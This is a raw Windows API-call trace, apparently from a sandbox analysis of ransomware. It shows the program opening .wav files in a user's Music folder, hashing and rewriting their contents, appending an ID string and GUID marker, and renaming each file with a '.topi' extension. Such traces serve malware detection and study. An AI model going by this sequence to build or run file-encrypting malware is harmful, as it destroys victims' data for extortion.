[0097.670] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.670] PathFindFileNameW (pszPath="") returned="" [0097.671] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\iXZ-OAS7MF.wav") returned=".wav" [0097.671] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\iXZ-OAS7MF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\xs9wh\\ixz-oas7mf.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.671] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=75153) returned 1 [0097.671] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.674] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1256b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.674] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.675] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df1a0) returned 1 [0097.677] CryptCreateHash (in: hProv=0x6df1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.677] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.677] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.677] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.677] GetLastError () returned 0x0 [0097.677] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.677] CryptReleaseContext (hProv=0x6df1a0, dwFlags=0x0) returned 1 [0097.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.677] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.677] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.677] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.677] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.677] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x12590) returned 0x9a06a00 [0097.678] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.678] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb7b8 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ee0 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb800 [0097.678] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4ef8 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f28 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f40 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.679] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9a8 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f40 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4f28 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9d8 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.679] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.679] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.680] GetCurrentThreadId () returned 0x8c4 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9f50 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.680] GetCurrentThreadId () returned 0x8c4 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.680] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.680] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f28 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f40 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f10 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4f58 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.681] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4a30 [0097.681] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f28 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a30 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f28 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0097.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.682] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f58 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f40 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f10 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99df068 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4ef8 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99fb800 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb988 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.683] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0097.683] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0x1258c, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0x1258c, lpOverlapped=0x0) returned 1 [0097.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0097.684] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x12591, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.684] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0097.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0097.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316d8a8 [0097.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x9a04420 [0097.684] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9a04420, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0097.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d01f0 [0097.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316d8a8 | out: hHeap=0x680000) returned 1 [0097.684] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d01f0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d01f0*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0097.684] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0097.684] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0097.684] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0097.685] CloseHandle (hObject=0x6a8) returned 1 [0097.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x31b41c0 [0097.686] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8a0) returned 0x31cf750 [0097.686] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b41c0 | out: hHeap=0x680000) returned 1 [0097.686] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\iXZ-OAS7MF.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\xs9wh\\ixz-oas7mf.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\iXZ-OAS7MF.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\xs9wh\\ixz-oas7mf.wav.topi")) returned 1 [0097.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.687] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.687] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.688] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b4696e0, ftCreationTime.dwHighDateTime=0x1d5b9ed, ftLastAccessTime.dwLowDateTime=0xc7eb4e60, ftLastAccessTime.dwHighDateTime=0x1d5bd09, ftLastWriteTime.dwLowDateTime=0xc7eb4e60, ftLastWriteTime.dwHighDateTime=0x1d5bd09, nFileSizeHigh=0x0, nFileSizeLow=0x25fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xsJpoDLC50i.wav", cAlternateFileName="XSJPOD~1.WAV")) returned 1 [0097.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.688] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xbe) returned 0x99e6040 [0097.688] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df1a0 | out: hHeap=0x680000) returned 1 [0097.688] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\xsJpoDLC50i.wav") returned=".wav" [0097.688] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\-u63kcF\\xS9wh\\xsJpoDLC50i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\-u63kcf\\xs9wh\\xsjpodlc50i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.689] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=9724) returned 1 [0097.689] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.692] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x25d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.692] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.693] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.693] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.693] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.693] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x25fc, lpOverlapped=0x0) returned 1 